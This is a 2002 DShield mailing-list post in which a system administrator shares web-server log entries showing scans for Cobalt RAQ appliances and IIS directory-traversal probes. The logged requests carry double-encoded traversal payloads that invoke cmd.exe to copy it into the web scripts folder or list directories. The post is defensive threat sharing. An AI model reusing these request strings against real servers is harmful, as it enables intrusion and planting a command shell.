[Dshield] Target list acquisition? Pre-deployment preparation?

Ed Truitt ed.truitt at etee2k.net
Fri Nov 8 13:24:57 GMT 2002


Here are some entries I found:

65.86.37.114 - - [04/Nov/2002:21:20:50 -0600] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/
c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe
HTTP/1.1" 404 320 "-" "-"
130.49.64.241 - - [05/Nov/2002:02:05:33 -0600] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?
/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe
HTTP/1.1" 404 320 "-" "-"
195.31.248.194 - - [05/Nov/2002:02:49:26 -0600] "GET
/scripts/..%255c%255c../winnt/system32/cmd.ex
e?/c+dir" 404 - "-" "-"
216.106.71.186 - - [05/Nov/2002:04:35:20 -0600] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe
?/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe
HTTP/1.1" 404 320 "-" "-"
208.181.135.3 - - [05/Nov/2002:13:43:06 -0600] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?
/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe
HTTP/1.1" 404 320 "-" "-"
66.134.238.74 - - [05/Nov/2002:13:45:36 -0600] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?
/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe
HTTP/1.1" 404 320 "-" "-"
65.95.166.39 - - [05/Nov/2002:20:29:02 -0600] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/
c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe
HTTP/1.1" 404 320 "-" "-"
65.93.29.79 - - [07/Nov/2002:01:30:24 -0600] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c
+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe
HTTP/1.1" 404 320 "-" "-"
66.158.116.36 - - [07/Nov/2002:06:03:11 -0600] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?
/c+copy+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\script.exe
HTTP/1.1" 404 320 "-" "-"

Interestingly enough, I run Apache on both my Linux boxes, but only one had
the probes.  Another item of interest:

195.92.95.61 - - [06/Nov/2002:07:17:00 -0600] "HEAD
/cobalt-images/welcome2.gif HTTP/1.0" 404 0 "-
" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"

Somebody is looking for Cobalt RAQ appliances - any new (or old) exploits
they might be looking for?

Cheers,
Ed Truitt
PGP fingerprint:  5368 D25E 468C A250 9833  CCD6 DBAE 9C25 02F9 0AB9
http://www.etee2k.net
http://www.bsatroop148.org

"Note to spammers:  my 'delete' key is connected to YOUR ISP.
 Also, if you send me UCE, I reserve the right to post your spew
on my Web site, with the appropriate color commentary, so that
others may have a good laugh at your expense."

----- Original Message -----
From: "Johannes Ullrich" <jullrich at euclidian.com>
To: <list at dshield.org>
Sent: Thursday, November 07, 2002 8:42 PM
Subject: [Dshield] Target list acquisition? Pre-deployment preparation?





More information about the list mailing list